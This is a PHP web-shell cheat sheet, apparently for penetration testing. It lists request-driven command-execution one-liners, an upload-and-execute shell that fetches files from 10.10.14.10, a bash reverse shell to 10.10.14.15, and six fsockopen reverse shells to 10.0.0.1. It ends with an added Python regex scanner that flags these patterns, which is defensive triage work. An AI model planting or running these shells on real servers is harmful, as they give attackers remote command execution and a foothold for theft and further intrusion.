
PHP Shells

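PHP can execute shell commands using exec, shell_exec, system, passthru and popen. The backtick operator, which appears in one of the reverse shell commands on this page, is equivalent to shell_exec.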

PHP cmd exec

PHP simple

<?php echo system($_REQUEST['cybo']); ?>

PHP Oneliner

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

PHP with file upload

$phpcode = <<<'EOD'

<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;

The <<<'EOD' ... EOD; (nowdoc) syntax assigns multiple lines of code to a variable.
The script provides both upload and execution: ?fupload=<file-name>&&fexec=<command-to-execute>

PHP reverse shell

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.15/9001 0>&1"'); ?>

PHP reverse shells - other commands

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
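
A defender-side triage check for the patterns listed on this page, added here as an example (not code from the original page): it flags request data reaching exec, shell_exec, system, passthru or popen, request-controlled file_put_contents, and shell commands redirected to descriptor 3 or /dev/tcp. The rule names, the scan function and the sample files are assumptions made for the illustration.

```python
import re

# Sinks are the five functions this page lists; backticks are checked separately.
SINKS = ("exec", "shell_exec", "system", "passthru", "popen")
SOURCE = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
# Lookbehind skips curl_exec(), $pdo->exec(), Foo::exec() and $exec().
SINK_CALL = re.compile(r"(?<![\w>:$])(?:%s)\s*\(([^;]*)" % "|".join(SINKS))
ASSIGN = re.compile(r"(\$\w+)\s*=[^;=]*" + SOURCE)   # $cmd = ($_REQUEST['cmd'])
BACKTICK = re.compile(r"`([^`]+)`")
FD_REDIRECT = re.compile(r"/dev/tcp/|[<>]&3\b")      # shell wired to a socket
REQ_WRITE = re.compile(r"\bfile_put_contents\s*\([^;]*" + SOURCE)


def scan(php: str) -> list[str]:
    """Return sorted rule names that fire on one PHP source string."""
    hits = set()
    tainted = {m.group(1) for m in ASSIGN.finditer(php)}
    commands = [m.group(1) for m in SINK_CALL.finditer(php)]
    for args in commands:
        if re.search(SOURCE, args):
            hits.add("request-to-sink")
        elif any(re.search(re.escape(v) + r"\b", args) for v in tainted):
            hits.add("tainted-var-to-sink")
    commands += [m.group(1) for m in BACKTICK.finditer(php)]
    if any(FD_REDIRECT.search(c) for c in commands):
        hits.add("shell-fd-redirect")
    if REQ_WRITE.search(php):
        hits.add("request-controlled-write")
    return sorted(hits)


# Constructed samples modelled on the snippets above (192.0.2.1 is a documentation address).
SAMPLES = {
    "simple.php": "<?php echo system($_REQUEST['c']); ?>",
    "oneliner.php": "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>",
    "upload.php": "<?php file_put_contents($_REQUEST['f'], file_get_contents('http://192.0.2.1/' . $_REQUEST['f']));"
                  " echo shell_exec($_REQUEST['x']); ?>",
    "revshell.php": "<?php $sock=fsockopen('192.0.2.1',4242); `/bin/sh -i <&3 >&3 2>&3`; ?>",
    "benign.php": "<?php $out = shell_exec('uptime'); echo htmlspecialchars($out); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:14} {scan(src) or 'clean'}")
```

Regex matching of this kind is a triage heuristic: encoded or obfuscated shells will not match, so it complements file-integrity monitoring of the web root rather than replacing it.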
